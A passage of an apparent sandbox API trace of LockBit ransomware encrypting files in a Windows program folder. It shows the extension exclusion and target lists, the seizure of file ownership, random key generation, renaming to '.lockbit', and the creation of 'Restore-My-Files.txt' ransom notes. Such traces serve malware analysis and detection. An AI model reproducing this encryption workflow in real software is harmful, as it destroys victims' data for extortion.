ReturnLength=0x3d6acd8) returned 0x0 [0082.783] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.783] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.783] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.784] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.784] CloseHandle (hObject=0x3c4) returned 1 [0082.784] free (_Block=0x77d800) [0082.784] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\perf_scenes_subpicture1.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.785] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.785] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.785] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4959) returned 1 [0082.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.785] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.786] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.791] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.791] malloc (_Size=0xce) returned 0x77d800 [0082.791] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0082.792] free (_Block=0x77d800) [0082.792] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Perf_Scenes_Subpicture1.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.792] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.792] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.792] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70269072, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70269072, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1197, dwReserved0=0x0, dwReserved1=0x0, cFileName="PreviousMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0082.792] lstrcmpiW (lpString1=".", lpString2="PreviousMenuButtonIcon.png") returned -1 [0082.792] lstrcmpiW (lpString1="..", lpString2="PreviousMenuButtonIcon.png") returned -1 [0082.792] PathFindExtensionW (pszPath="PreviousMenuButtonIcon.png") returned=".png" [0082.792] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.792] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.792] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.792] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.793] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.793] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.793] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.793] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.793] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.794] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.794] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.794] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.794] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.794] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.794] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.794] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.794] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PreviousMenuButtonIcon.png") returned 1 [0082.794] lstrcmpiW (lpString1="ntldr", lpString2="PreviousMenuButtonIcon.png") returned -1 [0082.794] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PreviousMenuButtonIcon.png") returned -1 [0082.794] lstrcmpiW (lpString1="bootsect.bak", lpString2="PreviousMenuButtonIcon.png") returned -1 [0082.795] lstrcmpiW (lpString1="autorun.inf", lpString2="PreviousMenuButtonIcon.png") returned -1 [0082.795] lstrcmpiW (lpString1="thumbs.db", lpString2="PreviousMenuButtonIcon.png") returned 1 [0082.795] lstrcmpiW (lpString1="iconcache.db", lpString2="PreviousMenuButtonIcon.png") returned -1 [0082.795] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.795] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png") returned=".png" [0082.795] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.795] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.795] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.795] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.796] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.796] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.796] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.796] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.796] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.796] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.796] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.796] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.796] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.796] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.796] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.796] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.796] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.796] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png.lockbit") returned 91 [0082.796] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.797] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.797] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.797] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.797] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.798] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.798] RtlFreeAnsiString (AnsiString="\\") [0082.798] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0082.798] malloc (_Size=0x200) returned 0x77d800 [0082.798] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.798] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.798] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.798] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.799] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.799] CloseHandle (hObject=0x3bc) returned 1 [0082.799] free (_Block=0x77d800) [0082.799] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0082.799] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.799] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.799] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4503) returned 1 [0082.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.801] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.801] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.812] malloc (_Size=0xcc) returned 0x77d800 [0082.812] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xcc, FileInformationClass=0xa) returned 0xc0000008 [0082.813] free (_Block=0x77d800) [0082.813] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIcon.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.813] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.813] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.813] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x702b532c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x702b532c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="PreviousMenuButtonIconSubpi.png", cAlternateFileName="")) returned 1 [0082.813] lstrcmpiW (lpString1=".", lpString2="PreviousMenuButtonIconSubpi.png") returned -1 [0082.813] lstrcmpiW (lpString1="..", lpString2="PreviousMenuButtonIconSubpi.png") returned -1 [0082.813] PathFindExtensionW (pszPath="PreviousMenuButtonIconSubpi.png") returned=".png" [0082.813] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.813] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.813] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.814] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.814] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.814] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.814] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.814] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.814] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.814] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.814] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.815] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.815] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.815] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.815] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PreviousMenuButtonIconSubpi.png") returned 1 [0082.815] lstrcmpiW (lpString1="ntldr", lpString2="PreviousMenuButtonIconSubpi.png") returned -1 [0082.815] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PreviousMenuButtonIconSubpi.png") returned -1 [0082.815] lstrcmpiW (lpString1="bootsect.bak", lpString2="PreviousMenuButtonIconSubpi.png") returned -1 [0082.815] lstrcmpiW (lpString1="autorun.inf", lpString2="PreviousMenuButtonIconSubpi.png") returned -1 [0082.815] lstrcmpiW (lpString1="thumbs.db", lpString2="PreviousMenuButtonIconSubpi.png") returned 1 [0082.815] lstrcmpiW (lpString1="iconcache.db", lpString2="PreviousMenuButtonIconSubpi.png") returned -1 [0082.815] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.815] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png") returned=".png" [0082.815] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.815] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.815] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.816] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.816] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.816] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.816] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.816] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.816] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.816] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.816] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.816] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png.lockbit") returned 96 [0082.817] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttoniconsubpi.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.818] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.819] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.819] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.819] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.819] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.819] RtlFreeAnsiString (AnsiString="\\") [0082.819] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0082.819] malloc (_Size=0x200) returned 0x77d800 [0082.819] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.819] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.820] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.820] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.820] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.820] CloseHandle (hObject=0x3bc) returned 1 [0082.821] free (_Block=0x77d800) [0082.821] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\previousmenubuttoniconsubpi.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0082.821] CreateIoCompletionPort 